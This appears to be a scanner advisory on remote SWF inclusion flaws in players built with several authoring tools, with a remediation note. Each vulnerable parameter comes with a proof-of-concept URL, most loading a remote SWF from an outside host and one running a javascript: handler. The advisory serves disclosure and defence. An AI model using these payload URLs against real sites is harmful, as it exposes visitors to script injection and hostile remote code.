Possible remote SWF inclusion

Description
  • A number of products used to create SWF files (Techsmith Camtasia, InfoSoft FusionCharts, Adobe Acrobat Connect, Macromedia Breeze, Adobe Dreamweaver, Adobe Contribute, Autodemo) were found vulnerable to remote SWF inclusion. This page includes a SWF file that is possibly affected by these vulnerabilities. <br/><br/> <ul> <li><strong>Adobe Dreamweaver and Contribute</strong><br/>The <strong><span class="bb-dark">"skinName"</span></strong> parameter loads an arbitrary flash file<br/> http://www.example.com/FLVPlayer_Progressive.swf?skinName=http://rcannings.googlepages.com/DoKnowEvil</li> <li><strong>Adobe Acrobat Connect (including Macromedia Breeze):</strong><br/>The <strong><span class="bb-dark">"baseurl"</span></strong> parameter loads an arbitrary flash file:<br/> http://www.example.com/main.swf?baseurl=http://rcannings.googlepages.com/DoKnowEvil.swf%3f </li> <li><strong>InfoSoft FusionCharts:</strong><br/>The <strong><span class="bb-dark">"dataURL"</span></strong> parameter loads an arbitrary flash file:<br/> http://www.example.com/Example.swf?debugMode=1&dataURL=%27%3E%3Cimg+src%3D%22http%3A//rcannings.googlepages.com/DoKnowEvil.swf%3F.jpg%22%3E </li> <li><strong>Techsmith Camtasia:</strong><br/>The <strong><span class="bb-dark">"csPreloader"</span></strong> parameter loads an arbitrary flash file:<br/> http://www.example.com/Example_controller.swf?csPreloader=http://rcannings.googlepages.com/DoKnowEvil.swf%3f </li> <li><strong>Autodemo:</strong><br/>The <strong><span class="bb-dark">"onend"</span></strong> parameter loads arbitrary URLs including the JavaScript protocol handler:<br/> http://www.example.com/control.swf?onend=javascript:alert(1)// </li> </ul>
Remediation
  • The product used to create this SWF file (Techsmith Camtasia, InfoSoft FusionCharts, Adobe Acrobat Connect, Macromedia Breeze, Adobe Dreamweaver, Adobe Contribute, Autodemo) should be upgraded to the latest version and the SWF file should be recompiled with the fixed version.
References